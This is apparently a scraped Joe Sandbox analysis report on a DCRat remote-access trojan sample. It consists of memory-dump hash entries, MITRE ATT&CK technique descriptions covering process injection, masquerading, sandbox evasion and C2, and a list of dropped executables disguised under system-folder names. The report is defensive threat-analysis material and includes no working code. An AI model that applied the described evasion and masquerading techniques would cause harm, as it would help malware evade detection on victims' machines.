Source File: 00000024.00000002.2245500800.00007FF848E7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c5387ac0efb0152fbee606c1ef434afcf02e8386bb373bb65ff5cc20e279298
Instruction ID: 316131a83a77afc50c0aefa5c46ffe7a0fdc3015645c12582c73c65080dbfcf2
Opcode Fuzzy Hash: 6c5387ac0efb0152fbee606c1ef434afcf02e8386bb373bb65ff5cc20e279298
Instruction Fuzzy Hash: C801D636A0D3866FD312E718D8914E93B70FF82351B0947F3D048CB0A3EA2CA4488764

Function 00007FF848E71CA5 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb02d640debd3029d67cf48d1d453f2fe7ae4c5bf8c9685449cca4ed9e6457e
Instruction ID: 5fb19dfb9248414935e71ab4fa3dbcb77625bb8903820c9f7876c855d9e73dba
Opcode Fuzzy Hash: 7fb02d640debd3029d67cf48d1d453f2fe7ae4c5bf8c9685449cca4ed9e6457e
Instruction Fuzzy Hash: 7D01A470D0D78E8FEB58EF64985A2B97BA0FF55341F5005BEE808C2191DB769454C744

Function 00007FF848E7B008 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20946938fea3faebc0190484d275f472734e095370b18fc8f78bce0db779d11
Instruction ID: a79f10c3fff3f95cba9f105a73fdb423860b096df11f37b04855eada1f01338b
Opcode Fuzzy Hash: e20946938fea3faebc0190484d275f472734e095370b18fc8f78bce0db779d11
Instruction Fuzzy Hash: FD015A7091894E9FEB88FFA4C4486BE76E4FF18345F1008BAD41EC2191EF35A150C744

Function 00007FF848E72F49 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2015e0ca7873b87e0840e043eb668ebc60266c9e4aef1c75afd98f79700bdc8a
Instruction ID: f372cf6e95a497f229145f0447f3403324d6c3edff59767ae0e70da4a6f9178d
Opcode Fuzzy Hash: 2015e0ca7873b87e0840e043eb668ebc60266c9e4aef1c75afd98f79700bdc8a
Instruction Fuzzy Hash: DC019A3090D6894FE756FB3488486A97BF0FF5A340F0605F2D40ACA0ABEA38A4448301

Function 00007FF848E728AD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee3e4becf1c5ccbcffd208659d8d80a2dbc45e4d4a3805530dc3152f6797f9f
Instruction ID: f17ad4539ca547e6aadfeb5f42e6b1d65a5f4193dcc57023adb109ef36a13d9a
Opcode Fuzzy Hash: eee3e4becf1c5ccbcffd208659d8d80a2dbc45e4d4a3805530dc3152f6797f9f
Instruction Fuzzy Hash: B6018B30D5D64E9FE751FB6488486B97BF0FF5A340F0149B6D409C70A2EF38A5948715

Function 00007FF848E87679 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89040922a8025f3ed6229eb1c36dbe549919fbe77908d191079ab5ab7e5f26f8
Instruction ID: ea45a64f6bc8537dbc486358b5721be0dbea31c0b0e73fa220fefbc9fe567e8a
Opcode Fuzzy Hash: 89040922a8025f3ed6229eb1c36dbe549919fbe77908d191079ab5ab7e5f26f8
Instruction Fuzzy Hash: 03017C30D5D68A9FE752BB3888492AD7BE0FF5A381F9605F6D018C70A2EF38A4448715

Function 00007FF848E8AAC0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef960d93b21bb9aa3785589fca2f71787b330def206925897248ca721bee4411
Instruction ID: 08da0056b5bd947eaf45691cffb14bf027f23342fb9e0914946a0259745274ca
Opcode Fuzzy Hash: ef960d93b21bb9aa3785589fca2f71787b330def206925897248ca721bee4411
Instruction Fuzzy Hash: D901043091894E9FEB88EB68C8496BE77A0FF19345F5009BAE41ED3191DF35A2548B44

Function 00007FF848E7C1F5 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db93244b5a6ab28874c02b01e100561d2d293f7d0046ded0db98fb01531099e0
Instruction ID: 4450111fcaaa4c1b186f1bcab51d2f83bc997646a0ad99131fd1c7548fbd7cfc
Opcode Fuzzy Hash: db93244b5a6ab28874c02b01e100561d2d293f7d0046ded0db98fb01531099e0
Instruction Fuzzy Hash: 9BF08C70C1DA8E8FEB94EF6488592BE7BA0FF19241F4505BAE818C2191EB789550C744

Function 00007FF848E7AC29 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94e8d53e532a88d522a59752f0c341ed43de397cf2e5ce63192b665aaf12c42
Instruction ID: 8eaacb7689aa6b8fa3070a202a57aa3a3ac4d600783c15de62be7dadce54aa79
Opcode Fuzzy Hash: e94e8d53e532a88d522a59752f0c341ed43de397cf2e5ce63192b665aaf12c42
Instruction Fuzzy Hash: 94018F3594D6896FE752FB3488991A97BF0FF1A340F0509F7D408CB0A2EF38A4849701

Function 00007FF848E70608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a40870f52e71f13bf607db79ae076d3ba966270b9baa415e4c37ce2f6019ea4
Instruction ID: 9200b398a403583d0728a6b8059c0343cadd78907314889bb8b026428a4bf25b
Opcode Fuzzy Hash: 3a40870f52e71f13bf607db79ae076d3ba966270b9baa415e4c37ce2f6019ea4
Instruction Fuzzy Hash: 1B01463091890E9EEB59EB2484492B972A0FF18345F1008BEE40AC6192DF3AA150C654

Function 00007FF848E70610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea7aed99e20777b32d3c9f69db118b666a5f22b81fbe7644b2f8fdd95af53ac
Instruction ID: 6742a810346c06ba7a83cf44e783eaa2b332f918b985330539483c7a83414411
Opcode Fuzzy Hash: 2ea7aed99e20777b32d3c9f69db118b666a5f22b81fbe7644b2f8fdd95af53ac
Instruction Fuzzy Hash: 83016930919A0E9EFB48FB6484492B973A0FF19345F1008BEE41FC21D2DF3AA550C604

Function 00007FF848E8F2C1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60bea52d92a38e7922df49df5efc720fd070b8b5c0cb11b4eebbf1291cee6637
Instruction ID: 2b58cf2f7ff719010d1b55d0de0b28ec47b9fb1b2ddbe697494e612b9cb3adfd
Opcode Fuzzy Hash: 60bea52d92a38e7922df49df5efc720fd070b8b5c0cb11b4eebbf1291cee6637
Instruction Fuzzy Hash: D7F08C70D0D68E8FEB84EF2888192BE7BE0FF55341F8005BBD818C3192EB3495548705

Function 00007FF848E71140 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0993504507539f5912690189fdaa7a0ae1748bb067265ceabc4abbb50325107
Instruction ID: 343277327636cf5ea07120c3b21fde046ecff9302b7c7cb12d56482cfd4d90dd
Opcode Fuzzy Hash: c0993504507539f5912690189fdaa7a0ae1748bb067265ceabc4abbb50325107
Instruction Fuzzy Hash: 18F0AF70D1CA1E8EFB98AA6898183FA77F0FF563A1F0001BAD419C60C1DF3511148645

Function 00007FF848E7ACA8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1827623b5c6048d672795d70361b7d6ec48d8a7ce18e7b0961df24005f8958ec
Instruction ID: 7e90087cab7eee49965e9c8864ca2580b32caf197897611ad500c50deb15af82
Opcode Fuzzy Hash: 1827623b5c6048d672795d70361b7d6ec48d8a7ce18e7b0961df24005f8958ec
Instruction Fuzzy Hash: FBF09036A4D51A7FD311F61CE8914FA73A0FF80365B088BB3D04DC7057EE29A04846A8

Function 00007FF848E705D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b05ccdcc7b96a706be43685e7326ba03c100c194fe5fec29f43994597120d47
Instruction ID: dfd30d46baf9da08c80bcc7e44aa50104d11237ab8650ccaa81367cc01d49888
Opcode Fuzzy Hash: 9b05ccdcc7b96a706be43685e7326ba03c100c194fe5fec29f43994597120d47
Instruction Fuzzy Hash: 8DF0CD3091DA4E9FEB48EEA494062FA77A0FF05385F10047AE80DC2181CB36A460CB88

Function 00007FF848E727C9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9b05c5dfd075f99cb00277b051f53b8744e805a30487135f2c8be7d49702584
Instruction ID: 5c4e642ccd17ebc65b4c6555c433acf141ffd2d9e2fe6c7f9c5070838b06d268
Opcode Fuzzy Hash: d9b05c5dfd075f99cb00277b051f53b8744e805a30487135f2c8be7d49702584
Instruction Fuzzy Hash: 16F04F3180E7898FFB6AAF2488191A93BB0FF06241F4505BAD40ACA1D3DB399854C751

Function 00007FF848E7283D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3599162d824c5116d18d4ee2b7f3183b92bfee439e1809882eca5f42e86c46
Instruction ID: 86dd7ede690565937206238ef834a9319b7e514c3cb7baa9f23ad6824842f83c
Opcode Fuzzy Hash: aa3599162d824c5116d18d4ee2b7f3183b92bfee439e1809882eca5f42e86c46
Instruction Fuzzy Hash: 58F0B43091E6898FFB59AF2484592B93BA0FF16341F4505BED80AC61D2DB399450C700

Function 00007FF848E70605 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a85dac32bf85141d25b5c60d8cb78f073b9237291e266e4b5f1d6914bafb16a9
Instruction ID: 03c5fd81c7f4e84d184936e6d38ec181dd8d3fced9bf6fbc1cd3636be6dc668d
Opcode Fuzzy Hash: a85dac32bf85141d25b5c60d8cb78f073b9237291e266e4b5f1d6914bafb16a9
Instruction Fuzzy Hash: E2F0ED3091D60E8FFB68AF2488092FE33A0FF05385F00183AE80EC10C2DF39A060C644

Function 00007FF848E854FB Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78982632196348643d99b138587f5dce21302dfdc4ff9003fa7e19019fd997c4
Instruction ID: f3cf1358c579bc62615962a29f2b7b071379c02302f4bc14cdd0ce08d713a9ed
Opcode Fuzzy Hash: 78982632196348643d99b138587f5dce21302dfdc4ff9003fa7e19019fd997c4
Instruction Fuzzy Hash: 23D01271D5CE198FE788FF18948D3BCBBE1FB54680F80442AC408D3181DF3054015754

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CPYEzG7VGh.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\RedistList\d5489f5e5451db

C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe

C:\Program Files\7-Zip\Lang\1a5d5b8dcee3d8

C:\Program Files\7-Zip\Lang\Memory Compression.exe

C:\Program Files\Windows NT\d5489f5e5451db

C:\Program Files\Windows NT\uXGucUKOPdf.exe

C:\Program Files\Windows Security\BrowserCore\en-US\d5489f5e5451db

C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe

C:\Recovery\d5489f5e5451db

C:\Recovery\uXGucUKOPdf.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Agentserver.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Memory Compression.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dasHost.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uXGucUKOPdf.exe.log

C:\Users\user\AppData\Local\Temp\HnPfnRVdev

Windows Analysis Report
CPYEzG7VGh.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre